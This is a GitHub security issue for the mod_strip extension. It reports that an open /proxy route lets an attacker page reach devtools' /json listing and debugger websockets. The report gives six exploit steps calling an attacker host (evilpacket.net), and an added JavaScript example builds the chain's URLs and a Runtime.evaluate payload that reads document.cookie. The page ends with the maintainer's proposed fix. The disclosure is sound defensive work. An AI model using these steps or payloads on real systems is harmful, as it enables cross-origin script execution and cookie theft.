[security] Devtools access vulnerability #56

Open
spolu opened this issue Jul 23, 2014 · 1 comment

spolu commented Jul 23, 2014

As reported by Adam Baldwin from andyet over email

Getting access to devtools

I'm curious to know what the /proxy route is actually used for on the
mod_strip extension? It allows for some interesting things. Specifically
one can use that route to load a page controlled by an attacker and
execute code.

Further, that code could then attempt to locate the port the devtools are
running on and find the various endpoints for the open tabs at the /json
endpoint.

Normally this would be blocked by same origin policy but because of the
proxy route it's possible to get those endpoints. Having the content of
that json file means a debugger websocket connection can be made to each
of those tabs and code executed in the context of those tabs, which
gives XSS on a variety of origins.

It would be pretty messy to exploit but here is how I would go about it.

  1. Make requests to the following URL to find the local port that allows
     proxy.
     127.0.0.1:PORT/proxy?url=http://evilpacket.net
  2. Make requests to the following URL to find the dev tools port that
     will give me the JSON endpoints. When it hits the right one it will
     notify the external service and we can correlate the 2 events.
     http://127.0.0.1:PORT/devtools/devtools.html?ws=evilpacket.net
  3. Redirect user to the following URL so that we can use same origin
     policy to get the JSON in the next step
     127.0.0.1:PORT_FROM_STEP_1/proxy?url=http://evilpacket.net/payload
  4. Get the JSON via a request to
     127.0.0.1:PORT_FROM_STEP_1/proxy?url=http://127.0.0.1:PORT_FROM_STEP_2/json
  5. Parse JSON for ws URLs
  6. Make web socket connections to each of those and do whatever with the
     content on the tabs, etc., acting as the devtools debugger over that ws
     channel.
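The six steps above, modelled as data-only helpers so the chain can be read end to end. This is an added example; it is not code from the report, from this issue, or from the mod_strip/Breach project. It assumes the /json listing uses Chrome's remote-debugging format (one object per target carrying a webSocketDebuggerUrl) and that the debugger websocket accepts Chrome DevTools Protocol messages such as Runtime.evaluate; neither is stated in the report. The ports, the attacker host and the sample listing are constructed. The code builds every URL and message the chain needs but opens no network connections.

```javascript
// Added example (not the issue's or the project's code). Models the report's
// attack chain offline. Assumed, not from the page: Chrome-style /json output
// and Chrome DevTools Protocol messages on the debugger websocket.

// Steps 1 and 3: the open /proxy route. Whatever the browser process fetches
// on the attacker's behalf is served back from the 127.0.0.1 origin, which is
// what defeats the same-origin policy for the attacker's page.
// The report writes the target unencoded; encoding it keeps '?' and '&' in
// the target from being parsed as extra proxy parameters.
function proxyUrl(proxyPort, target) {
  return `http://127.0.0.1:${proxyPort}/proxy?url=${encodeURIComponent(target)}`;
}

// Step 2: probe URLs for candidate devtools ports. On the right port
// devtools.html loads and opens a websocket to the attacker's host (the "ws"
// parameter), which is the out-of-band signal used to correlate the hit.
function devtoolsProbeUrls(ports, attackerHost) {
  return ports.map(p => `http://127.0.0.1:${p}/devtools/devtools.html?ws=${attackerHost}`);
}

// Step 4: the target listing fetched through the proxy, so its response is
// same-origin with the attacker's page (itself loaded through the proxy).
function jsonViaProxy(proxyPort, devtoolsPort) {
  return proxyUrl(proxyPort, `http://127.0.0.1:${devtoolsPort}/json`);
}

// Step 5: extract the debugger websocket URL of every debuggable target.
// Targets that already have a debugger attached carry no URL and are skipped;
// malformed input yields an empty list rather than an exception.
function parseDebugTargets(jsonText) {
  let targets;
  try { targets = JSON.parse(jsonText); } catch { return []; }
  if (!Array.isArray(targets)) return [];
  return targets
    .filter(t => t && typeof t.webSocketDebuggerUrl === 'string')
    .map(t => ({ id: t.id, pageUrl: t.url, ws: t.webSocketDebuggerUrl }));
}

// Step 6: the message a debugger client sends over each websocket to run
// script in that tab's origin (assumed CDP method). Each message needs a
// unique id so replies can be matched to requests.
function evaluateMessage(seq, expression) {
  return JSON.stringify({ id: seq, method: 'Runtime.evaluate', params: { expression } });
}

// Constructed sample /json body in the assumed format (not captured from a
// real instance). The third target is already being debugged: no ws URL.
const SAMPLE_JSON = JSON.stringify([
  { id: 'A1', type: 'page', url: 'https://mail.example/inbox',
    webSocketDebuggerUrl: 'ws://127.0.0.1:9222/devtools/page/A1' },
  { id: 'B2', type: 'page', url: 'https://bank.example/',
    webSocketDebuggerUrl: 'ws://127.0.0.1:9222/devtools/page/B2' },
  { id: 'C3', type: 'page', url: 'https://busy.example/' },
]);

// Walk the chain with the ports from steps 1 and 2 already known and the
// /json body already retrieved. Returns the fetch URL and, per reachable
// tab, the websocket to open and the first message to send.
function attackPlan(proxyPort, devtoolsPort, jsonText) {
  const targets = parseDebugTargets(jsonText);
  return {
    jsonUrl: jsonViaProxy(proxyPort, devtoolsPort),
    messages: targets.map((t, i) => ({
      ws: t.ws,
      pageUrl: t.pageUrl,
      payload: evaluateMessage(i + 1, 'document.cookie'),
    })),
  };
}

// Stand-alone run over the constructed input (ports are assumptions).
const demo = attackPlan(8080, 9222, SAMPLE_JSON);
console.log(JSON.stringify(demo, null, 2));
```

The point the helpers make concrete is that nothing in the chain needs a bug in devtools itself: the proxy turns an attacker page into a 127.0.0.1-origin page, and from that origin the /json listing and the debugger websockets are reachable just as they would be for a local debugger client.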
spolu commented Jul 23, 2014

The proxy is used today to proxy the favicons in order to sniff their color. We could automatically retrieve the favicon from the module server side and pass ids instead of URLs to the client side to retrieve the content of these favicons, removing the need for the proxy.

@spolu spolu added the Bug label Jul 23, 2014